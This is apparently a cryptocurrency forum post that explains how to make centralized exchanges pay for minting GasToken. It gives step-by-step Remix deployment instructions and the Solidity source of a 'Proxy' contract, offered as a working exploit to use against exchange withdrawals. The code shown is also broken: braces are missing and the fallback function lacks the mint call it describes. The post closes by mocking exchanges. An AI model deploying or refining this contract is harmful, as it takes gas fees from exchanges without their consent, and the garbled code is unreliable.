Make centralized exchanges mine GasToken for you


There have been rumours of a malicious mining attack. The organizations that are really affected by it are primarily centralized exchanges (real DEXs are unaffected).

The gist of the so-called attack is that you can create a little smart contract that will mine some GST and send it to your address. Then when you withdraw money from a centralized exchange you provide the address of this smart contract instead of your wallet address. Every time you withdraw money from such an exchange, even 0.0001 ETC (or ETH, works on both networks), they will effectively send you the requested money AND 1 GST of your choice.

The code of the so-called exploit is attached to this post. You can open remix with Saturn Wallet activated, copypaste this code, compile with Solidity 0.4.19 (screenshot attached), click Run, and deploy the Proxy contract. Then use the address of the deployed contract as your receiving address.


I can neither confirm nor deny that this code works, use at your own risk :angel:

pragma solidity ^0.4.19;

contract GST {
  function transfer(address _to, uint256 _value) public returns (bool);
  function mint(uint256 value) public;

contract Proxy {
  // GST1
  /* address private gastoken = 0x88d60255F917e3eb94eaE199d827DAd837fac4cB; */
  // GST2
  address private gastoken = 0x0000000000b3F879cb30FE243b4Dfee438691c04;
  uint256 amount = 100; // 1 GST per invocation, feel free to change
  address admin;

  function Proxy() {
    admin = msg.sender;

  function () payable public {
    // forward incoming ether
    // mint some gastokens
    // transfer minted gastoken
    GST(gastoken).transfer(admin, amount);


“Many exchanges allow the withdrawal of Ethereum to arbitrary addresses with no gas usage limit. Since sending Ethereum to a contract address executes its fallback function, attackers can make these exchanges pay for arbitrary computation. This allows attackers to force exchanges to burn their own Ethereum on high transaction costs,” explained the researchers.


Instead of just wasting the gas, the attackers may store it as Gas Tokens, without being noticed easily. Gas Token does not trade separately, and has no price setting process, so it may not be sold.

trade @!

Code is Law.


To those that use cryptocurremcy for speculation on binance these news are indeed scary and “hacky”. What do these nerds think they are doing? I need lambo fast, stop spreading FUD!

The rest know that incompetent centralized exchanges can burn in hell and for everything else there is Saturn Network.